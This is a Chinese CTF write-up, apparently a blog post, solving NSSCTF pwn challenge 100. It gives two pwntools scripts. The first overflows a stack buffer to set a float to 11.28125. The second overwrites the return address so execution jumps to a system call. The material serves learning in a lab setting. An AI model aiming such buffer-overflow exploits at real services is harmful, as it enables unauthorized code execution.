NSSCTF ID:100

image.png
checksec一下,然后再直接连上去试试
image.png
没用,我们之间去IDA分析好了
image.png
代码逻辑就是我们输入等于11.28125就把flag给我们,去试试
image.png
发现他还是说我们是错的,这我就不是很明白了
后面看来大佬们的WP,才知道这里不能直接输入,需要转换一下
image.png
大佬的方法是用溢出v1的值溢出,使v2的值为11.28125
image.png

from pwn import *
import struct


io = remote('node4.anna.nssctf.cn',28127)

sh=11.28125

sh_bytes=struct.pack('f', sh)

payload=b'a'*44+sh_bytes

io.sendline(payload)

io.interactive()

这就是脚本,参考https://www.nssctf.cn/note/set/7051
image.png
这样就成了
后面看到还有一种方法
image.png
就是在这里,我们看到了有gets,有system直接让gets溢出,然后执行system,说干就干,试试
image.png

from pwn import *
import struct


io = remote('node4.anna.nssctf.cn',28127)

#sh=11.28125

#sh_bytes=struct.pack('f', sh)
cat=0x004006BE

payload=b'a'*0x30+b'b'*8+p64(cat)

io.sendline(payload)

io.interactive()

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值